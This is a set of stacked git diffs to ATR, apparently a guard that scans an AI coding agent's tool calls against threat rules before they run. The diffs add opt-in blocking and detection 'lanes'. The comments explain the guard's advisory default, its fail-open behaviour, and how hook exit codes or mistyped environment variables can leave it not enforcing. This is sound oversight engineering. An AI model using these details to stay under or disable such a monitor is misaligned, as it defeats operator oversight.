+    console.error(`${RED}Error: --blocking and --no-blocking are mutually exclusive.${RESET}`);
+    process.exit(1);
+  }
+  if (on) return true;
+  if (off) return false;
+  return undefined;
 }
 
 // --- VALIDATE command ---
@@ -652,21 +711,40 @@ async function cmdGuard(options: Record<string, string>): Promise<void> {
   const failOpen = options['fail-open'] !== 'false';
   const parsedTimeout = options['timeout'] ? parseInt(options['timeout'], 10) : 5000;
   const timeoutMs = (Number.isFinite(parsedTimeout) && parsedTimeout > 0) ? parsedTimeout : 5000;
+  const lane = readLaneOption(options);
+  // Absent flag stays undefined so ATR_BLOCKING can still speak; --blocking=false
+  // is an explicit "no" that overrides the environment.
+  const blocking = readBlockingOption(options);
 
   const { ActionExecutor } = await import('./action-executor.js');
   const { StdioAdapter } = await import('./adapters/stdio-adapter.js');
   const { HookHandler } = await import('./hook-handler.js');
 
-  const engine = new ATREngine({ rulesDir });
+  const engine = new ATREngine({ rulesDir, ...(lane ? { lane } : {}) });
   const ruleCount = await engine.loadRules();
 
   const adapter = new StdioAdapter();
-  const executor = new ActionExecutor({ adapter, dryRun });
-  const handler = new HookHandler({ engine, executor, timeoutMs, failOpen });
+  const executor = new ActionExecutor({
+    adapter,
+    dryRun,
+    ...(blocking === undefined ? {} : { blocking }),
+  });
+  const handler = new HookHandler({
+    engine,
+    executor,
+    timeoutMs,
+    failOpen,
+    ...(blocking === undefined ? {} : { blocking }),
+  });
 
+  // State the enforcement posture out loud. "Installed" must never be mistaken
+  // for "enforcing": in advisory mode this guard emits no permissionDecision at
+  // all and dispatches no action above the OBSERVE tier.
   process.stderr.write(
     `[atr-guard] Loaded ${ruleCount} rules from ${rulesDir}` +
-    `${dryRun ? ' (dry-run)' : ''}\n`
+    `${dryRun ? ' (dry-run)' : ''}\n` +
+    `[atr-guard] lane=${engine.getLane()} blocking=${handler.isBlocking() ? 'on' : 'off'}` +
+    `${handler.isBlocking() ? '' : ' (advisory: detections are reported, nothing is blocked)'}\n`
   );
 
   await handler.startStdioLoop();
@@ -1062,6 +1140,10 @@ function cmdInit(options: Record<string, string>): void {
   console.log(`${DIM}Every tool call Claude Code makes will now be scanned against ATR`);
   console.log(`threat detection rules before execution. Suspicious actions will be`);
   console.log(`flagged with severity and recommendation.${RESET}\n`);
+  console.log(`${BOLD}Mode: advisory.${RESET} ${DIM}The guard reports detections and does NOT block:`);
+  console.log(`it emits no permissionDecision, so Claude Code's own permission flow is`);
+  console.log(`untouched. Turn blocking on when you have chosen a lane you trust:`);
+  console.log(`  ${BLOCKING_ENV_VAR}=1 ${LANE_ENV_VAR}=enforce   (or: atr guard --blocking --lane enforce)${RESET}\n`);
 }
 
 // --- CONVERT command ---
@@ -1219,6 +1301,8 @@ async function main(): Promise<void> {
   }
 
   const rulesDir = options['rules'] ? resolve(options['rules']) : RULES_DIR;
+  // Validated once here so `atr scan --lane typo` fails before any rule loads.
+  const scanLane = readLaneOption(options);
 
   switch (command) {
     case 'scan':
@@ -1235,6 +1319,7 @@ async function main(): Promise<void> {
         semanticModel: options['semantic-model'],
         semanticTimeout: options['semantic-timeout'],
         semanticNoJsonMode: options['semantic-no-json-mode'] === 'true',
+        ...(scanLane ? { lane: scanLane } : {}),
       });
       break;
     case 'scan-skill':
@@ -1252,6 +1337,7 @@ async function main(): Promise<void> {
         semanticModel: options['semantic-model'],
         semanticTimeout: options['semantic-timeout'],
         semanticNoJsonMode: options['semantic-no-json-mode'] === 'true',
+        ...(scanLane ? { lane: scanLane } : {}),
       });
       break;
     case 'validate':

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -18,7 +18,13 @@ import { loadRuleFile, loadRulesFromDirectory, validateRule } from './loader.js'
 import type { AgentEvent, ATRMatch, ATRRule, ATRTrace } from './types.js';
 import { generateBadgeSvg, generateBadgeEndpoint, lookupPackageScan, generateBadgeMarkdown } from './badge.js';
 import { cmdScanUnified } from './cli/scan-handler.js';
-import { BLOCKING_ENV_VAR, LANE_ENV_VAR, parseLane } from './enforcement.js';
+import {
+  BLOCKING_ENV_VAR,
+  LANE_ENV_VAR,
+  parseLane,
+  resolveEnforcementPolicy,
+  type EnforcementPolicy,
+} from './enforcement.js';
 import { LANES, type Lane } from './quality/rule-contract.js';
 
 const __filename = fileURLToPath(import.meta.url);
@@ -163,10 +169,12 @@ function parseArgs(argv: string[]): { command: string; target: string; options: 
 /**
  * Read `--lane <enforce|alert|hunt>`.
  *
- * Returns undefined when the flag is absent so the engine falls through to
- * ATR_LANE and then to the built-in default; an unrecognised value is a usage
- * error, never a silent fallback (an operator who typed `--lane enfroce` must
- * not be left believing they are enforcing).
+ * Returns undefined when the flag is absent, so resolveEnforcementPolicy falls
+ * through to ATR_LANE and then to the built-in default; an unrecognised value
+ * is a usage error and exits, never a silent fallback (an operator who typed
+ * `--lane enfroce` must not be left believing they are enforcing). A flag is
+ * typed at a prompt by someone who will see the exit code — unlike an inherited
+ * environment variable, which degrades instead. See resolvePolicyAndReport.
  */
 function readLaneOption(options: Record<string, string>): Lane | undefined {
   const raw = options['lane'];
@@ -198,6 +206,36 @@ function readBlockingOption(options: Record<string, string>): boolean | undefine
   if (on) return true;
   if (off) return false;
   return undefined;
+}
+
+/**
+ * Resolve the enforcement posture for this process and report any problems.
+ *
+ * This is the CLI's half of the library/CLI split: `src/enforcement.ts` reads
+ * the environment here and nowhere else, and the resolved lane/blocking values
+ * are then passed EXPLICITLY into ATREngine / ActionExecutor / HookHandler.
+ *
+ * Notes are warnings, not errors, and the process keeps running. A bad flag has
+ * already exited by the time this runs — readLaneOption / readBlockingOption
+ * validate and exit while the arguments are being evaluated. A bad environment
+ * variable degrades to the advisory
+ * posture instead, because `atr guard` runs as a Claude Code command hook where
+ * a non-zero exit is measurably worse than a warning: the host maps any exit
+ * status other than 0 or 2 to a non-blocking error, runs the tool anyway, hands
+ * the model nothing, and renders only "<hookName> hook error" WITHOUT the
+ * stderr text. Exiting would therefore discard every detection and still not
+ * tell the operator why. (Status 2 is the only loud one, and it blocks the tool
+ * outright — a stray shell variable must not do that.) Verified against the
+ * Claude Code 2.1.76 hook dispatcher; see resolveEnforcementPolicy.
+ */
+function resolvePolicyAndReport(
+  flags: { readonly lane?: Lane | undefined; readonly blocking?: boolean | undefined }
+): EnforcementPolicy {
+  const policy = resolveEnforcementPolicy(flags);
+  for (const note of policy.notes) {
+    console.error(`${RED}[atr] ${note}${RESET}`);
+  }
+  return policy;
 }
 
 // --- VALIDATE command ---
@@ -711,40 +749,43 @@ async function cmdGuard(options: Record<string, string>): Promise<void> {
   const failOpen = options['fail-open'] !== 'false';
   const parsedTimeout = options['timeout'] ? parseInt(options['timeout'], 10) : 5000;
   const timeoutMs = (Number.isFinite(parsedTimeout) && parsedTimeout > 0) ? parsedTimeout : 5000;
-  const lane = readLaneOption(options);
-  // Absent flag stays undefined so ATR_BLOCKING can still speak; --blocking=false
-  // is an explicit "no" that overrides the environment.
-  const blocking = readBlockingOption(options);
+  // Absent flags stay undefined so the environment can still speak;
+  // --no-blocking is an explicit "no" that overrides it.
+  const policy = resolvePolicyAndReport({
+    lane: readLaneOption(options),
+    blocking: readBlockingOption(options),
+  });
 
   const { ActionExecutor } = await import('./action-executor.js');
   const { StdioAdapter } = await import('./adapters/stdio-adapter.js');
   const { HookHandler } = await import('./hook-handler.js');
 
-  const engine = new ATREngine({ rulesDir, ...(lane ? { lane } : {}) });
+  // Everything below receives the resolved posture explicitly. None of these
+  // constructors reads the environment.
+  const engine = new ATREngine({ rulesDir, lane: policy.lane });
   const ruleCount = await engine.loadRules();
 
   const adapter = new StdioAdapter();
-  const executor = new ActionExecutor({
-    adapter,
-    dryRun,
-    ...(blocking === undefined ? {} : { blocking }),
-  });
+  const executor = new ActionExecutor({ adapter, dryRun, blocking: policy.blocking });
   const handler = new HookHandler({
     engine,
     executor,
     timeoutMs,
     failOpen,
-    ...(blocking === undefined ? {} : { blocking }),
+    blocking: policy.blocking,
   });
 
   // State the enforcement posture out loud. "Installed" must never be mistaken
   // for "enforcing": in advisory mode this guard emits no permissionDecision at
-  // all and dispatches no action above the OBSERVE tier.
+  // all and dispatches no action above the OBSERVE tier. Even with blocking on,
+  // ATR only ever emits deny/ask — never an affirmative allow.
   process.stderr.write(
     `[atr-guard] Loaded ${ruleCount} rules from ${rulesDir}` +
     `${dryRun ? ' (dry-run)' : ''}\n` +
     `[atr-guard] lane=${engine.getLane()} blocking=${handler.isBlocking() ? 'on' : 'off'}` +
-    `${handler.isBlocking() ? '' : ' (advisory: detections are reported, nothing is blocked)'}\n`
+    `${handler.isBlocking()
+      ? ' (deny/ask only; never approves a tool call)'
+      : ' (advisory: detections are reported, nothing is blocked)'}\n`
   );
 
   await handler.startStdioLoop();
@@ -754,7 +795,8 @@ async function cmdGuard(options: Record<string, string>): Promise<void> {
 
 async function cmdMcp(): Promise<void> {
   const { startMCPServer } = await import('./mcp-server.js');
-  await startMCPServer();
+  // The MCP server never blocks, so only the lane half of the policy applies.
+  await startMCPServer({ lane: resolvePolicyAndReport({}).lane });
 }
 
 // --- SCAFFOLD command ---
@@ -1301,8 +1343,17 @@ async function main(): Promise<void> {
   }
 
   const rulesDir = options['rules'] ? resolve(options['rules']) : RULES_DIR;
-  // Validated once here so `atr scan --lane typo` fails before any rule loads.
-  const scanLane = readLaneOption(options);
+
+  /**
+   * Lane for the scanning commands. Resolved lazily so only the commands that
+   * actually have a lane pay for it — resolving eagerly would print an ATR_LANE
+   * warning while running `atr stats`, and would print it a second time inside
+   * `atr guard`, which resolves its own (blocking-aware) policy.
+   *
+   * `--lane typo` exits before any rule loads; ATR_LANE is read here because
+   * the engine no longer reads it.
+   */
+  const scanLane = (): Lane => resolvePolicyAndReport({ lane: readLaneOption(options) }).lane;
 
   switch (command) {
     case 'scan':
@@ -1319,7 +1370,7 @@ async function main(): Promise<void> {
         semanticModel: options['semantic-model'],
         semanticTimeout: options['semantic-timeout'],
         semanticNoJsonMode: options['semantic-no-json-mode'] === 'true',
-        ...(scanLane ? { lane: scanLane } : {}),
+        lane: scanLane(),
       });
       break;
     case 'scan-skill':
@@ -1337,7 +1388,7 @@ async function main(): Promise<void> {
         semanticModel: options['semantic-model'],
         semanticTimeout: options['semantic-timeout'],
         semanticNoJsonMode: options['semantic-no-json-mode'] === 'true',
-        ...(scanLane ? { lane: scanLane } : {}),
+        lane: scanLane(),
       });
       break;
     case 'validate':

--- a/src/cli/scan-handler.ts
+++ b/src/cli/scan-handler.ts
@@ -47,10 +47,11 @@ export interface ScanOptions {
   readonly semanticTimeout?: string;
   readonly semanticNoJsonMode?: boolean;
   /**
-   * Detection lane (which rule maturities may fire). Undefined defers to
-   * ATR_LANE and then to the built-in default — see src/enforcement.ts.
-   * Scanning never blocks anything, so the blocking opt-in has no meaning here;
-   * only the lane does.
+   * Detection lane (which rule maturities may fire). Undefined means the
+   * engine's built-in default; `src/cli.ts` resolves `--lane` and `ATR_LANE`
+   * and always passes an explicit value, because the engine itself no longer
+   * reads the environment. Scanning never blocks anything, so the blocking
+   * opt-in has no meaning here; only the lane does.
    */
   readonly lane?: Lane;
 }

--- a/src/cli/scan-handler.ts
+++ b/src/cli/scan-handler.ts
@@ -9,6 +9,7 @@ import { readFileSync, existsSync, statSync, readdirSync } from 'node:fs';
 import { resolve } from 'node:path';
 import { ATREngine } from '../engine.js';
 import type { AgentEvent, ATRMatch, ScanResult, ScanType } from '../types.js';
+import type { Lane } from '../quality/rule-contract.js';
 import { scanResultToSARIF } from '../converters/sarif.js';
 import { createTCReporter } from '../tc-reporter.js';
 import { createSemanticJudgeFromConfig } from './semantic-judge-config.js';
@@ -45,6 +46,13 @@ export interface ScanOptions {
   readonly semanticModel?: string;
   readonly semanticTimeout?: string;
   readonly semanticNoJsonMode?: boolean;
+  /**
+   * Detection lane (which rule maturities may fire). Undefined defers to
+   * ATR_LANE and then to the built-in default — see src/enforcement.ts.
+   * Scanning never blocks anything, so the blocking opt-in has no meaning here;
+   * only the lane does.
+   */
+  readonly lane?: Lane;
 }
 
 /** Detect whether the target is an MCP event JSON or SKILL.md file/directory. */
@@ -160,7 +168,12 @@ async function scanMcpEvents(
   }
 
   const semantic = createSemanticJudgeFromScanOptions(options);
-  const engine = new ATREngine({ rulesDir, reporter, semanticJudge: semantic.judge });
+  const engine = new ATREngine({
+    rulesDir,
+    reporter,
+    semanticJudge: semantic.judge,
+    ...(options.lane ? { lane: options.lane } : {}),
+  });
   await engine.loadRules();
   if (semantic.enabled && !options.json && !options.sarif) {
     console.error(`${DIM}Semantic judge: enabled for method=semantic rules${RESET}`);
@@ -256,7 +269,12 @@ async function scanSkillFiles(
   }
 
   const semantic = createSemanticJudgeFromScanOptions(options);
-  const engine = new ATREngine({ rulesDir, reporter, semanticJudge: semantic.judge });
+  const engine = new ATREngine({
+    rulesDir,
+    reporter,
+    semanticJudge: semantic.judge,
+    ...(options.lane ? { lane: options.lane } : {}),
+  });
   await engine.loadRules();
   if (semantic.enabled && !options.json && !options.sarif) {
     console.error(`${DIM}Semantic judge: enabled for method=semantic rules${RESET}`);

--- a/src/enforcement.ts
+++ b/src/enforcement.ts
@@ -18,13 +18,22 @@
  *
  * WHY BLOCKING IS OPT-IN
  *
- * spec/atr-method-v1.1.md:164 — "Engines SHOULD NOT auto-block ... without
- * operator policy explicitly enabling it". SPEC.md §5.5 — "Engines MUST NOT
- * execute response actions automatically without an explicit configuration
- * directive from the operator." docs/QUALITY-STANDARD.md restricts blocking to
- * `maturity: stable` rules. Until this module existed there was no way for an
- * operator to express that directive: no CLI flag, no environment variable, no
- * documented config key. This module IS that directive.
+ * The load-bearing requirement is SPEC.md §5.5, which is engine-wide:
+ * "Engines MUST NOT execute response actions automatically without an explicit
+ * configuration directive from the operator." Until this module existed there
+ * was no way for an operator to express that directive — no CLI flag, no
+ * environment variable, no documented config key. This module IS that directive.
+ *
+ * Two weaker statements point the same way but must not be quoted as general
+ * rules, because they are not:
+ *   - spec/atr-method-v1.1.md §5.6 says "Engines SHOULD NOT auto-block ON A
+ *     HASH MATCH without operator policy explicitly enabling it". That sits
+ *     under §5 Signature Method and is scoped to hash matches. An earlier
+ *     revision of this comment elided "on a hash match" and widened it into a
+ *     general SHOULD NOT. It is not one.
+ *   - docs/QUALITY-STANDARD.md restricts blocking to `maturity: stable` rules,
+ *     but that section is deployment guidance addressed to consumers, not a
+ *     normative engine requirement.
  *
  * WHY "NOT BLOCKING" IS NOT THE SAME AS "allow"
  *

--- a/src/enforcement.ts
+++ b/src/enforcement.ts
@@ -1,0 +1,174 @@
+/**
+ * Enforcement policy — the two operator switches, and the one precedence rule
+ * that governs both.
+ *
+ * ATR separates DETECTION from ENFORCEMENT. Detection always runs; enforcement
+ * is what the engine is allowed to DO with a detection:
+ *
+ *   lane      Which rule maturities may fire at all.
+ *             'enforce' = stable only, 'alert' = stable+test, 'hunt' = all.
+ *             Implemented by the lane gate in engine.ts (see passesLane).
+ *
+ *   blocking  Whether ATR may express a blocking decision. OFF BY DEFAULT.
+ *             When off: the Claude Code hook contract omits permissionDecision
+ *             entirely (the host applies its own default — ATR does not vote),
+ *             and the ActionExecutor refuses to dispatch any response action
+ *             above the OBSERVE blast-radius tier. Detection output is
+ *             unchanged in both modes.
+ *
+ * WHY BLOCKING IS OPT-IN
+ *
+ * spec/atr-method-v1.1.md:164 — "Engines SHOULD NOT auto-block ... without
+ * operator policy explicitly enabling it". SPEC.md §5.5 — "Engines MUST NOT
+ * execute response actions automatically without an explicit configuration
+ * directive from the operator." docs/QUALITY-STANDARD.md restricts blocking to
+ * `maturity: stable` rules. Until this module existed there was no way for an
+ * operator to express that directive: no CLI flag, no environment variable, no
+ * documented config key. This module IS that directive.
+ *
+ * WHY "NOT BLOCKING" IS NOT THE SAME AS "allow"
+ *
+ * In the Claude Code PreToolUse contract, `permissionDecision: "allow"` is not
+ * neutral — it is an affirmative approval that suppresses the host's own
+ * permission prompt. Downgrading a block to `allow` would make ATR *weaken* the
+ * host's built-in safety. Advisory mode therefore omits the field rather than
+ * setting it, so the host falls back to whatever it would have done with no
+ * hook installed. See toClaudeCodePreToolUse in hook-handler.ts.
+ *
+ * PRECEDENCE (identical for both switches, deliberately explicit)
+ *
+ *     explicit programmatic config  >  environment variable  >  built-in default
+ *
+ * An explicit value always wins, so a host embedding the engine cannot have its
+ * policy silently overridden by an environment variable it did not set. An
+ * invalid value from either source throws instead of falling back: a typo in
+ * ATR_LANE must never leave the operator believing they are in a lane they are
+ * not.
+ *
+ * @module agent-threat-rules/enforcement
+ */
+
+import { LANES, type Lane } from './quality/rule-contract.js';
+import { ACTION_TIERS, actionTier } from './quality/action-eligibility.js';
+
+/** Environment variable naming the detection lane. */
+export const LANE_ENV_VAR = 'ATR_LANE';
+
+/** Environment variable enabling blocking (the operator directive). */
+export const BLOCKING_ENV_VAR = 'ATR_BLOCKING';
+
+/**
+ * Lane used when neither config nor environment says otherwise.
+ * 'hunt' keeps every maturity visible — advisory breadth, which is safe
+ * precisely because blocking is off by default.
+ */
+export const DEFAULT_LANE: Lane = 'hunt';
+
+/** Blocking is off until an operator turns it on. */
+export const DEFAULT_BLOCKING = false;
+
+const LANE_SET: ReadonlySet<string> = new Set(LANES);
+
+const TRUE_VALUES: ReadonlySet<string> = new Set(['1', 'true', 'yes', 'on']);
+const FALSE_VALUES: ReadonlySet<string> = new Set(['0', 'false', 'no', 'off']);
+
+/** Minimal read-only view of an environment. Keeps this module testable. */
+export type EnvSource = Readonly<Record<string, string | undefined>>;
+
+/**
+ * Parse a lane name. Returns null for anything not in LANES, so callers that
+ * want to report a usage error (the CLI) can do so without a try/catch.
+ */
+export function parseLane(value: string): Lane | null {
+  const trimmed = value.trim();
+  return LANE_SET.has(trimmed) ? (trimmed as Lane) : null;
+}
+
+/**
+ * Parse a boolean switch value. Returns null for anything unrecognised.
+ * An empty string is treated as "not set" by the resolvers, not by this
+ * function — it returns null here so the caller decides.
+ */
+export function parseBooleanFlag(value: string): boolean | null {
+  const normalized = value.trim().toLowerCase();
+  if (TRUE_VALUES.has(normalized)) return true;
+  if (FALSE_VALUES.has(normalized)) return false;
+  return null;
+}
+
+/**
+ * Resolve the active detection lane: explicit > env > default.
+ *
+ * @throws TypeError when either source carries a value that is not a lane.
+ */
+export function resolveLane(
+  explicit?: Lane | string,
+  env: EnvSource = process.env
+): Lane {
+  if (explicit !== undefined) {
+    const parsed = parseLane(explicit);
+    if (parsed === null) {
+      throw new TypeError(
+        `Invalid lane "${explicit}". Expected one of: ${LANES.join(', ')}.`
+      );
+    }
+    return parsed;
+  }
+
+  const fromEnv = env[LANE_ENV_VAR];
+  if (fromEnv !== undefined && fromEnv.trim() !== '') {
+    const parsed = parseLane(fromEnv);
+    if (parsed === null) {
+      throw new TypeError(
+        `Invalid ${LANE_ENV_VAR}="${fromEnv}". Expected one of: ${LANES.join(', ')}.`
+      );
+    }
+    return parsed;
+  }
+
+  return DEFAULT_LANE;
+}
+
+/**
+ * Resolve whether blocking is enabled: explicit > env > default (false).
+ *
+ * @throws TypeError when the environment variable is set to a value that is
+ *         neither truthy nor falsy by the table above. Silently reading
+ *         `ATR_BLOCKING=enabled` as "off" would be the worst possible failure:
+ *         an operator who believes enforcement is on while it is not.
+ */
+export function resolveBlocking(
+  explicit?: boolean,
+  env: EnvSource = process.env
+): boolean {
+  if (explicit !== undefined) return explicit;
+
+  const fromEnv = env[BLOCKING_ENV_VAR];
+  if (fromEnv !== undefined && fromEnv.trim() !== '') {
+    const parsed = parseBooleanFlag(fromEnv);
+    if (parsed === null) {
+      throw new TypeError(
+        `Invalid ${BLOCKING_ENV_VAR}="${fromEnv}". Expected one of: ` +
+          `${[...TRUE_VALUES].join('/')} or ${[...FALSE_VALUES].join('/')}.`
+      );
+    }
+    return parsed;
+  }
+
+  return DEFAULT_BLOCKING;
+}
+
+/**
+ * Is this response action enforcement rather than observation?
+ *
+ * The observe/enforce split is NOT redefined here — it reads the blast-radius
+ * ladder in src/quality/action-eligibility.ts, which is the project's single
+ * ranking of what an action destroys. OBSERVE (alert / snapshot / shadow /
+ * escalate) changes nothing about the agent's execution and therefore always
+ * runs. Everything above it (INTERRUPT / DEGRADE / TERMINATE) denies an
+ * operation, alters session state, or destroys the session — that is
+ * enforcement and requires the operator directive.
+ */
+export function isEnforcementAction(action: string): boolean {
+  return actionTier(action) > ACTION_TIERS.OBSERVE;
+}

--- a/src/enforcement.ts
+++ b/src/enforcement.ts
@@ -53,11 +53,15 @@
  * ATREngine / ActionExecutor / HookHandler explicitly.
  *
  * Not "the only function in the package that touches process.env" — that is
- * false and an earlier revision of this comment said it. Eleven files under
- * src/ read the environment, including `adapters/openshell-filter.ts` and
+ * false and an earlier revision of this comment said it. Ten files under src/
+ * read the environment in code, including `adapters/openshell-filter.ts` and
  * `adapters/nemoclaw-preflight.ts`, which read `ATR_MIN_SEVERITY` and block by
  * default. Those adapters are outside this switch and stay that way; see the
- * scope limit in CHANGELOG.md. Reproduce with: grep -rl "process\.env" src/
+ * scope limit in CHANGELOG.md.
+ *
+ * `grep -rl "process\.env" src/` returns eleven, not ten: `src/index.ts` only
+ * names it in a comment. The correction above was itself first written as
+ * "eleven" off that grep, which is the same mistake one level down.
  *
  * Library constructors take `laneFromConfig` / `blockingFromConfig`, which
  * cannot read the environment — `resolveLane` and `resolveBlocking` require an

--- a/src/enforcement.ts
+++ b/src/enforcement.ts
@@ -47,9 +47,17 @@
  *
  * WHO READS THE ENVIRONMENT
  *
- * Only the CLI. `resolveEnforcementPolicy` below is the single entry point that
- * touches `process.env`, and `src/cli.ts` is its only caller; it hands the
- * resolved values to ATREngine / ActionExecutor / HookHandler explicitly.
+ * For the lane and blocking switches: only the CLI. `resolveEnforcementPolicy`
+ * below is the only function that reads `process.env` for THESE TWO switches,
+ * and `src/cli.ts` is its only caller; it hands the resolved values to
+ * ATREngine / ActionExecutor / HookHandler explicitly.
+ *
+ * Not "the only function in the package that touches process.env" — that is
+ * false and an earlier revision of this comment said it. Eleven files under
+ * src/ read the environment, including `adapters/openshell-filter.ts` and
+ * `adapters/nemoclaw-preflight.ts`, which read `ATR_MIN_SEVERITY` and block by
+ * default. Those adapters are outside this switch and stay that way; see the
+ * scope limit in CHANGELOG.md. Reproduce with: grep -rl "process\.env" src/
  *
  * Library constructors take `laneFromConfig` / `blockingFromConfig`, which
  * cannot read the environment — `resolveLane` and `resolveBlocking` require an

--- a/src/enforcement.ts
+++ b/src/enforcement.ts
@@ -168,6 +168,76 @@ export function resolveBlocking(
 }
 
 /**
+ * Same resolution, but never throws.
+ *
+ * WHY BOTH EXIST
+ *
+ * Throwing on a typo is right for an explicit invocation: `atr guard` should
+ * refuse to start rather than run with an enforcement posture the operator did
+ * not ask for. Silently reading `ATR_BLOCKING=enabled` as "off" is the worst
+ * failure this module can produce.
+ *
+ * It is wrong for a library constructor. `new ATREngine()` inside the VS Code
+ * extension, or `new ATRProcessor()` inside someone's Mastra pipeline, did not
+ * ask to read the environment — the environment is ambient. A stray
+ * `ATR_LANE=enfroce` in a shell profile should not crash an editor extension on
+ * activation, and `ATR_BLOCKING=enabled` should not stop the guard from
+ * starting at all, which is what it did: exit 1, nothing on stdout, no guard.
+ * That lands hardest on the operator who was trying to turn enforcement ON.
+ *
+ * So: constructors warn loudly and fall back to the safe default; the CLI keeps
+ * the throwing resolvers and formats the error itself. Loud is what stops this
+ * being the silent fallback the throwing version exists to prevent.
+ *
+ * The warning is emitted once per distinct bad value per process, so a hook
+ * invoked on every tool call does not turn stderr into a wall.
+ */
+const warned = new Set<string>();
+
+function warnOnce(message: string): void {
+  if (warned.has(message)) return;
+  warned.add(message);
+  process.stderr.write(`[atr] ${message}\n`);
+}
+
+/** Test seam: forget which warnings have already been emitted. */
+export function resetEnforcementWarnings(): void {
+  warned.clear();
+}
+
+export function resolveLaneOrWarn(
+  explicit?: Lane | string,
+  env: EnvSource = process.env
+): Lane {
+  try {
+    return resolveLane(explicit, env);
+  } catch (error) {
+    if (explicit !== undefined) throw error; // caller's own bug, not ambient
+    warnOnce(
+      `${(error as Error).message} Falling back to lane "${DEFAULT_LANE}". ` +
+        `Detection is unaffected; this only changes which maturities may fire.`
+    );
+    return DEFAULT_LANE;
+  }
+}
+
+export function resolveBlockingOrWarn(
+  explicit?: boolean,
+  env: EnvSource = process.env
+): boolean {
+  try {
+    return resolveBlocking(explicit, env);
+  } catch (error) {
+    if (explicit !== undefined) throw error;
+    warnOnce(
+      `${(error as Error).message} Falling back to blocking=${DEFAULT_BLOCKING}. ` +
+        `If you meant to enable enforcement, it is NOT enabled.`
+    );
+    return DEFAULT_BLOCKING;
+  }
+}
+
+/**
  * Is this response action enforcement rather than observation?
  *
  * The observe/enforce split is NOT redefined here — it reads the blast-radius

--- a/src/enforcement.ts
+++ b/src/enforcement.ts
@@ -35,24 +35,44 @@
  *     but that section is deployment guidance addressed to consumers, not a
  *     normative engine requirement.
  *
- * WHY "NOT BLOCKING" IS NOT THE SAME AS "allow"
+ * WHY ATR NEVER SAYS "allow"
  *
  * In the Claude Code PreToolUse contract, `permissionDecision: "allow"` is not
  * neutral — it is an affirmative approval that suppresses the host's own
- * permission prompt. Downgrading a block to `allow` would make ATR *weaken* the
- * host's built-in safety. Advisory mode therefore omits the field rather than
- * setting it, so the host falls back to whatever it would have done with no
- * hook installed. See toClaudeCodePreToolUse in hook-handler.ts.
+ * permission prompt. ATR emits a permission decision only to RESTRAIN an
+ * operation (deny / ask). "No rule matched" is not "I approve this": it is ATR
+ * having nothing to say, and the host must be left on its own default path.
+ * This holds in BOTH modes — advisory omits every decision, and blocking omits
+ * the affirmative one. See toClaudeCodePreToolUse in hook-handler.ts.
  *
- * PRECEDENCE (identical for both switches, deliberately explicit)
+ * WHO READS THE ENVIRONMENT
  *
- *     explicit programmatic config  >  environment variable  >  built-in default
+ * Only the CLI. `resolveEnforcementPolicy` below is the single entry point that
+ * touches `process.env`, and `src/cli.ts` is its only caller; it hands the
+ * resolved values to ATREngine / ActionExecutor / HookHandler explicitly.
  *
- * An explicit value always wins, so a host embedding the engine cannot have its
- * policy silently overridden by an environment variable it did not set. An
- * invalid value from either source throws instead of falling back: a typo in
- * ATR_LANE must never leave the operator believing they are in a lane they are
- * not.
+ * Library constructors take `laneFromConfig` / `blockingFromConfig`, which
+ * cannot read the environment — `resolveLane` and `resolveBlocking` require an
+ * EnvSource argument, so there is no overload that silently falls through to
+ * `process.env`. This is structural, not a convention: an embedder cannot
+ * accidentally opt into ambient configuration.
+ *
+ * The rule exists because ambient configuration crosses trust boundaries
+ * invisibly. `new ATREngine()` inside a VS Code extension, a Mastra pipeline,
+ * or the `/openshell-filter`, `/nemoclaw-preflight` and `/mcp` entry points did
+ * not ask to be reconfigured by a shell profile — and `ATR_LANE=enforce` is a
+ * VALID value, so the old behaviour produced no warning at all while narrowing
+ * those callers to maturity=stable rules only.
+ *
+ * PRECEDENCE
+ *
+ *   library:  explicit config  >  built-in default
+ *   CLI:      flag  >  environment variable  >  built-in default
+ *
+ * An invalid explicit value (config field or CLI flag) throws or exits: that is
+ * the caller's own bug, reported where the caller is looking. An invalid
+ * ENVIRONMENT value degrades loudly instead — see resolveEnforcementPolicy for
+ * the measurement behind that split.
  *
  * @module agent-threat-rules/enforcement
  */
@@ -87,10 +107,18 @@ export type EnvSource = Readonly<Record<string, string | undefined>>;
 /**
  * Parse a lane name. Returns null for anything not in LANES, so callers that
  * want to report a usage error (the CLI) can do so without a try/catch.
+ *
+ * Trimmed and case-INSENSITIVE, matching parseBooleanFlag exactly. The two were
+ * asymmetric: `ATR_BLOCKING=ON` worked while `ATR_LANE=ENFORCE` did not, and the
+ * pair `ATR_LANE=ENFORCE ATR_BLOCKING=ON` therefore turned blocking on while
+ * silently widening the lane to hunt — the operator asked for the narrowest
+ * enforcement posture and got the broadest one. The fallback direction was
+ * exactly the dangerous one, so the fix is to accept the spelling, not to
+ * document the trap.
  */
 export function parseLane(value: string): Lane | null {
-  const trimmed = value.trim();
-  return LANE_SET.has(trimmed) ? (trimmed as Lane) : null;
+  const normalized = value.trim().toLowerCase();
+  return LANE_SET.has(normalized) ? (normalized as Lane) : null;
 }
 
 /**
@@ -108,11 +136,16 @@ export function parseBooleanFlag(value: string): boolean | null {
 /**
  * Resolve the active detection lane: explicit > env > default.
  *
+ * `env` is REQUIRED and has no `process.env` default. That is the whole
+ * mechanism keeping ambient configuration out of the library: a caller must
+ * name the environment it wants read, and library constructors pass NO_ENV via
+ * laneFromConfig. Only the CLI passes `process.env`.
+ *
  * @throws TypeError when either source carries a value that is not a lane.
  */
 export function resolveLane(
-  explicit?: Lane | string,
-  env: EnvSource = process.env
+  explicit: Lane | string | undefined,
+  env: EnvSource
 ): Lane {
   if (explicit !== undefined) {
     const parsed = parseLane(explicit);
@@ -141,16 +174,35 @@ export function resolveLane(
 /**
  * Resolve whether blocking is enabled: explicit > env > default (false).
  *
- * @throws TypeError when the environment variable is set to a value that is
- *         neither truthy nor falsy by the table above. Silently reading
- *         `ATR_BLOCKING=enabled` as "off" would be the worst possible failure:
- *         an operator who believes enforcement is on while it is not.
+ * `env` is REQUIRED — see resolveLane for why.
+ *
+ * @throws TypeError when the explicit value is not a boolean, or when the
+ *         environment variable is set to a value that is neither truthy nor
+ *         falsy by the table above.
+ *
+ *         The explicit-value check is not decoration. `blocking` crosses from
+ *         untyped JavaScript (and from JSON config files) as often as from
+ *         TypeScript, and every non-empty string is truthy: without this,
+ *         `new ActionExecutor({ adapter, blocking: "false" })` TURNS BLOCKING
+ *         ON while reading, to its author, as an explicit "off". The lane path
+ *         validated its explicit value from the start; this one did not, and a
+ *         switch that fails toward "more enforcement" is the wrong asymmetry to
+ *         leave in place.
  */
